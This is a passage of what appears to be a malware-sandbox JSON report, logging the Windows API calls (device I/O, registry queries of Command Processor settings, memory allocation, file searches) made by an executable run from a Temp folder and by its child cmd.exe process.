"pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\CSIDL_X" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1302 }, { "timestamp": "2025-03-02 21:32:31,128", "thread_id": "4148", "caller": "0x00408adf", "parentcaller": "0x00409c49", "category": "process", "api": "NtTerminateProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "ExitCode", "value": "0x00000000" } ], "repeated": 0, "id": 1303 } ], "threads": [ "4148", "3612" ], "environ": { "UserName": "admin", "ComputerName": "DESKTOP-JQK72EN", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Users\\pacop\\AppData\\Local\\Temp\\", "CommandLine": "\"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe\" ", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "e4dd-cd2a", "SystemVolumeGUID": "16132ca6-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x00400000", "MainExeSize": "0x00042000", "Bitness": "32-bit" }, "file_activities": { "read_files": [], "write_files": [], "delete_files": [] } }, { "process_id": 8980, "process_name": "cmd.exe", "parent_id": 4492, "module_path": "C:\\Windows\\SysWOW64\\cmd.exe", "first_seen": "2025-03-02 21:32:28,970", "calls": [ { "timestamp": "2025-03-02 21:32:29,001", "thread_id": "10680", "caller": "0x771b6c26", "parentcaller": "0x771b6b31", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 0 }, { "timestamp": "2025-03-02 21:32:29,001", "thread_id": "9864", "caller": "0x771a204e", "parentcaller": "0x7719ddc1", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000007c" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 3, "id": 1 }, { "timestamp": "2025-03-02 21:32:29,001", "thread_id": "8536", "caller": "0x764ea562", "parentcaller": "0x764ea478", "category": "device", "api": "NtDeviceIoControlFile", "status": false, "return": "0xffffffffc00700bb", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00(\\xf4$\\x06\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\xf4$\\x06\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 2 }, { "timestamp": "2025-03-02 21:32:29,001", "thread_id": "8536", "caller": "0x771b6c26", "parentcaller": "0x771b6b31", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 3 }, { "timestamp": "2025-03-02 21:32:29,001", "thread_id": "9864", "caller": "0x764ea562", "parentcaller": "0x764ea478", "category": "device", "api": "NtDeviceIoControlFile", "status": false, "return": "0xffffffffc00700bb", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\n\\x00\\x00\\x00p\\xb5\\x1cw \\xf3\\x10\\x06\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\xfd\\x81\\x1dw(\\xf3\\x10\\x06\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 4 }, { "timestamp": "2025-03-02 21:32:29,001", "thread_id": "9864", "caller": "0x771b6c26", "parentcaller": "0x771b6b31", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 5 }, { "timestamp": "2025-03-02 21:32:29,001", "thread_id": "10920", "caller": "0x764ea562", "parentcaller": "0x764ea478", "category": "device", "api": "NtDeviceIoControlFile", "status": false, "return": "0xffffffffc00700bb", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\n\\x00\\x00\\x00p\\xb5\\x1cw\\x88\\xf5\\xfc\\x05\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\xfd\\x81\\x1dw\\x90\\xf5\\xfc\\x05\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 6 }, { "timestamp": "2025-03-02 21:32:29,001", "thread_id": "10920", "caller": "0x771b6c26", "parentcaller": "0x771b6b31", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 7 }, { "timestamp": "2025-03-02 21:32:29,001", "thread_id": "9160", "caller": "0x764ea562", "parentcaller": "0x764ea478", "category": "device", "api": "NtDeviceIoControlFile", "status": false, "return": "0xffffffffc00700bb", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\n\\x00\\x00\\x00p\\xb5\\x1cw\\xe8\\xf4\\xa4\\x04\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\xfd\\x81\\x1dw\\xf0\\xf4\\xa4\\x04\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 8 }, { "timestamp": "2025-03-02 21:32:29,001", "thread_id": "9160", "caller": "0x771b6c26", "parentcaller": "0x771b6b31", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 9 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x005809de", "parentcaller": "0x00586a0a", "category": "threading", "api": "NtOpenThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x00000230" }, { "name": "DesiredAccess", "value": "0x001fffff", "pretty_value": "THREAD_ALL_ACCESS" }, { "name": "ProcessId", "value": "8980" }, { "name": "ThreadId", "value": "10680" } ], "repeated": 0, "id": 10 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057e2df", "parentcaller": "0x00586a0a", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 11 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057e2ff", "parentcaller": "0x00586a0a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetThreadUILanguage" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75897140" } ], "repeated": 0, "id": 12 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057e2c8", "parentcaller": "0x00586a0a", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xfc\\xf5\\xcf\\x02\\xc8\\xf6\\xcf\\x02\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\xf6\\xcf\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 13 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00580a10", "parentcaller": "0x00586a0a", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 0, "id": 14 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00580a10", "parentcaller": "0x00586a0a", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xf4\\xf7\\xcf\\x02\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00T\\xf8\\xcf\\x02\\xdb\\x9e6s\\xa8cUs$\\xb6\\sl\\x92\\xe3\\x048\\xe9Ws\\xa4\\xf8\\xcf\\x02\\x00\\x00\\xd0\\x02\\xec\\xf9\\xcf\\x02\\x14\\xf8\\xcf\\x02\\x18-\\xee\\x02" } ], "repeated": 0, "id": 15 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00580a10", "parentcaller": "0x00586a0a", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000022c" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-2901619373-3413834416-3107304870-1001" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 16 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00580a10", "parentcaller": "0x00586a0a", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 0, "id": 17 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00580a10", "parentcaller": "0x00586a0a", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x0000022c" }, { "name": "ObjectAttributesName", "value": "Software\\Policies\\Microsoft\\Windows\\System" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System" } ], "repeated": 0, "id": 18 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00581f20", "parentcaller": "0x00586a0a", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xf4\\xf8\\xcf\\x02@\\xf9\\xcf\\x02\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\xdc\\x96UsH\\xf9\\xcf\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 19 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00578836", "parentcaller": "0x00580a55", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x9c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc8\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 20 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057884a", "parentcaller": "0x00580a55", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x98\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc8\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 21 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057e328", "parentcaller": "0x00580a55", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x9c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc8\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 22 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057e33f", "parentcaller": "0x00580a55", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x9c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xc8\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 23 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057e3d7", "parentcaller": "0x00580a55", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x9c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc8\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 24 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057e36e", "parentcaller": "0x00580a55", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x98\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xc8\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 25 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057e3a0", "parentcaller": "0x00580a55", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x98\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc8\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 26 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057aa00", "parentcaller": "0x00580a55", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02f03000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 27 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057aa00", "parentcaller": "0x00580a55", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02f04000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 28 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x005782d9", "parentcaller": "0x0057886a", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 29 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x005782d9", "parentcaller": "0x0057886a", "category": "registry", "api": "NtOpenKeyEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000240" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000124" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Command Processor" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Command Processor" } ], "repeated": 0, "id": 30 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00578319", "parentcaller": "0x0057886a", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000240" }, { "name": "ValueName", "value": "DisableUNCCheck" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\DisableUNCCheck" } ], "repeated": 0, "id": 31 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00578353", "parentcaller": "0x0057886a", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000240" }, { "name": "ValueName", "value": "EnableExtensions" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\EnableExtensions" } ], "repeated": 0, "id": 32 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x005783a3", "parentcaller": "0x0057886a", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000240" }, { "name": "ValueName", "value": "DelayedExpansion" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\DelayedExpansion" } ], "repeated": 0, "id": 33 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x005783dd", "parentcaller": "0x0057886a", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000240" }, { "name": "ValueName", "value": "DefaultColor" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\DefaultColor" } ], "repeated": 0, "id": 34 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057842d", "parentcaller": "0x0057886a", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000240" }, { "name": "ValueName", "value": "CompletionChar" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "9" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\CompletionChar" } ], "repeated": 0, "id": 35 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057849e", "parentcaller": "0x0057886a", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000240" }, { "name": "ValueName", "value": "PathCompletionChar" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "9" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\PathCompletionChar" } ], "repeated": 0, "id": 36 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057852c", "parentcaller": "0x0057886a", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000240" }, { "name": "ValueName", "value": "AutoRun" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Command Processor\\AutoRun" } ], "repeated": 0, "id": 37 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00578540", "parentcaller": "0x0057886a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000240" } ], "repeated": 0, "id": 38 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x005782d9", "parentcaller": "0x0057886a", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, "id": 39 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x005782d9", "parentcaller": "0x0057886a", "category": "registry", "api": "NtOpenKeyEx", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x0000022c" }, { "name": "ObjectAttributesName", "value": "Software\\Microsoft\\Command Processor" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor" } ], "repeated": 0, "id": 40 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057855a", "parentcaller": "0x0057886a", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 41 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00578561", "parentcaller": "0x0057886a", "category": "misc", "api": "srand", "status": true, "return": "0x00000000", "arguments": [ { "name": "seed", "value": "0x67c5100d" } ], "repeated": 0, "id": 42 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0058744a", "parentcaller": "0x00586e48", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04943000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 43 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0058744a", "parentcaller": "0x00586e48", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x06510000" }, { "name": "RegionSize", "value": "0x00100000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 44 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0058744a", "parentcaller": "0x00586e48", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x06510000" }, { "name": "RegionSize", "value": "0x00011000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 45 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0058744a", "parentcaller": "0x00586e48", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x06521000" }, { "name": "RegionSize", "value": "0x00010000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 46 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057a9aa", "parentcaller": "0x00578901", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02f05000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 47 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0058744a", "parentcaller": "0x00586e48", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x06531000" }, { "name": "RegionSize", "value": "0x00010000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 48 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00578d99", "parentcaller": "0x005801ce", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp" } ], "repeated": 0, "id": 49 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0058029d", "parentcaller": "0x00578dc1", "category": "filesystem", "api": "FindFirstFileExW", "status": true, "return": "0x02ef6ca8", "arguments": [ { "name": "FileName", "value": "C:\\Users" }, { "name": "FirstCreateTimeLow", "value": "0x3a6eea36" }, { "name": "FirstCreateTimeHigh", "value": "0x01d5acdd" } ], "repeated": 0, "id": 50 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x005802b6", "parentcaller": "0x00578dc1", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000240" } ], "repeated": 0, "id": 51 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0058029d", "parentcaller": "0x00578dc1", "category": "filesystem", "api": "FindFirstFileExW", "status": true, "return": "0x02ef6c68", "arguments": [ { "name": "FileName", "value": 